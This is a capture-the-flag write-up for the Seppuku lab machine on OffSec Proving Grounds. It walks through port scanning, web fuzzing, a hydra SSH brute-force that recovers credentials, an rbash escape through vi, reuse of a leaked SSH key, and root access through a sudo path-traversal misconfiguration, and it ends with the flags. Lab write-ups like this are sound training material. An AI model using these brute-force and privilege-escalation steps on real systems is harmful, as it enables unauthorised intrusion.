Seppuku
This is my write ups for Seppuku (See original submission) on Off-Sec Proving Ground.
This room is a CTF type of room
I will try to go deep into the technical thing we do in this room.
1. Enum
- Start the machine and get the IP
- Export the IP to the terminal so we can use it easier
export IP=192.168.152.90;clear
## Test to see if the IP is correct
echo $IP
- Start our usual port scans
nmap -sC -sV $IP
rustscan -a $IP
Nmap default scan result
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 cd:55:a8:e4:0f:28:bc:b2:a6:7d:41:76:bb:9f:71:f4 (RSA)
| 256 16:fa:29:e4:e0:8a:2e:7d:37:d2:6f:42:b2:dc:e9:22 (ECDSA)
|_ 256 bb:74:e8:97:fa:30:8d:da:f9:5c:99:f0:d9:24:8a:d5 (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Restricted Content
|_http-title: 401 Authorization Required
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
8088/tcp open http LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title: Seppuku
Service Info: Host: SEPPUKU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h39m58s, deviation: 2h53m12s, median: -2s
|_nbstat: NetBIOS name: SEPPUKU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-02-21T07:32:04
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: seppuku
| NetBIOS computer name: SEPPUKU\x00
| Domain name: \x00
| FQDN: seppuku
|_ System time: 2022-02-21T02:32:03-05:00
Rustscan result
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack
22/tcp open ssh syn-ack
80/tcp open http syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack
7080/tcp open empowerid syn-ack
7601/tcp open unknown syn-ack
8088/tcp open radan-http syn-ack
- When we try to see the landing page on port
80it require us cred to login
- Checking if we can do
anonymouslogin toftpand look like we can't
ftp -p $IP
Connected to 192.168.152.90.
220 (vsFTPd 3.0.3)
Name (192.168.152.90:minhnq): anonymous
331 Please specify the password.
Password:
421 Service not available, remote server has closed connection.
ftp: Login failed
- There is also nothing on
smb
smbclient -L=$IP -N
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Samba 4.9.5-Debian)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP SEPPUKU
2. Foothold
- Since the machine name is
seppukuwe will use that asusernameand runhydrato brute forcesshrunning in the back ground, that won't kill us
hydra -l seppuku -P /usr/share/wordlists/rockyou.txt $IP ssh -t 32
Looking around on other port we will see another port
7601also runningapacheAt the same time with
hydra, we can runwfuzzon the target website on port7601to find any files or directories.
## Fuzzing for files
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-small-words.txt --hc 403,404 "http://$IP:7601/FUZZ"
---
000001420: 301 9 L 28 W 326 Ch "ckeditor"
000001409: 301 9 L 28 W 324 Ch "secret"
000003630: 301 9 L 28 W 328 Ch "production"
000003890: 301 9 L 28 W 322 Ch "keys"
===
## Fuzzing for directories
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-small-words.txt --hc 403,404 "http://$IP:7601/FUZZ/"
---
000001420: 200 130 L 571 W 7244 Ch "ckeditor"
000001435: 200 15 L 49 W 735 Ch "q"
000001409: 200 20 L 102 W 1745 Ch "secret"
000003630: 200 348 L 1402 W 16697 Ch "production"
000003890: 200 17 L 69 W 1139 Ch "keys"
- From
http://192.168.152.90:7601/secret/we can get a file calledpassword.lstmaybe we can replace this as password file forhydrato attack ?
hydra -l seppuku -P password.lst $IP ssh -t 32
---
[22][ssh] host: 192.168.152.90 login: seppuku password: eeyoree
- And we got the result back, now we can
sshinto the machine asseppuku:eeyoree
3. PrivEsc
ssh seppuku@$IP
Look like we are in a restricted bash
To escape
rbash
vi
:set shell=/bin/bash
:shell
- Doing some manual enum
seppuku@seppuku:~$ ls -la
total 32
drwxr-xr-x 3 seppuku seppuku 4096 Sep 1 2020 .
drwxr-xr-x 5 root root 4096 May 13 2020 ..
-rw-r--r-- 1 seppuku seppuku 220 May 13 2020 .bash_logout
-rw-r--r-- 1 seppuku seppuku 3526 May 13 2020 .bashrc
drwx------ 3 seppuku seppuku 4096 May 13 2020 .gnupg
-rw-r--r-- 1 seppuku seppuku 33 Feb 21 02:29 local.txt
-rw-r--r-- 1 root root 20 May 13 2020 .passwd
-rw-r--r-- 1 seppuku seppuku 807 May 13 2020 .profile
seppuku@seppuku:~$ cat .passwd
12345685213456!@!@A
- Look like we got a password but for who ? or what ?
ls /home/
samurai seppuku tanto
- Lets see if we can switch to other user with password
12345685213456!@!@A
SPOILER ALEART
The password belong to user samurai
samurai@seppuku:~$ sudo -l
Matching Defaults entries for samurai on seppuku:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User samurai may run the following commands on seppuku:
(ALL) NOPASSWD: /../../../../../../home/tanto/.cgi_bin/bin /tmp/*
- From
http://192.168.152.90:7601/keys/we can findprivateandprivate.bakfiles and they are bothsshkey, maybe they belong to one of the 3 users
samurai
seppuku
tanto
- After some try we can login as user
tantousingprivate
Login as tanto
chmod 600 private
ssh -i private tanto@$IP
- Lets think about this for a second. We know that user
samuraican run the file/../../../../../../home/tanto/.cgi_bin/binand that file belong totantoand we cansshin as usertanto.
tanto@seppuku:~$ ls -la
total 28
drwxr-xr-x 4 tanto tanto 4096 Sep 1 2020 .
drwxr-xr-x 5 root root 4096 May 13 2020 ..
-rw-r--r-- 1 tanto tanto 220 May 13 2020 .bash_logout
-rw-r--r-- 1 tanto tanto 3526 May 13 2020 .bashrc
drwx------ 3 tanto tanto 4096 May 13 2020 .gnupg
-rw-r--r-- 1 tanto tanto 807 May 13 2020 .profile
drwxr-xr-x 2 tanto tanto 4096 May 13 2020 .ssh
- But the user
tantodoes not have that file. So what we can do it that we can create that file, give it malicious content and let usersamurairunsudoasrooton that file and we can becomeroot
## As user tanto
### Escape rbash
vi
:set shell=/bin/bash
:shell
### Make malicious file
cd
mkdir .cgi_bin
cd .cgi_bin/
echo -e "/bin/bash" > bin
chmod 777 bin
## As user samurai
sudo ../../../../../../home/tanto/.cgi_bin/bin /tmp/*
Get the flags
cat /home/seppuku/local.txt /root/proof.txt
7d6b688a6832e040ac2c7c62e6c5031d
21b2a584e2058d14116f3475d5acac74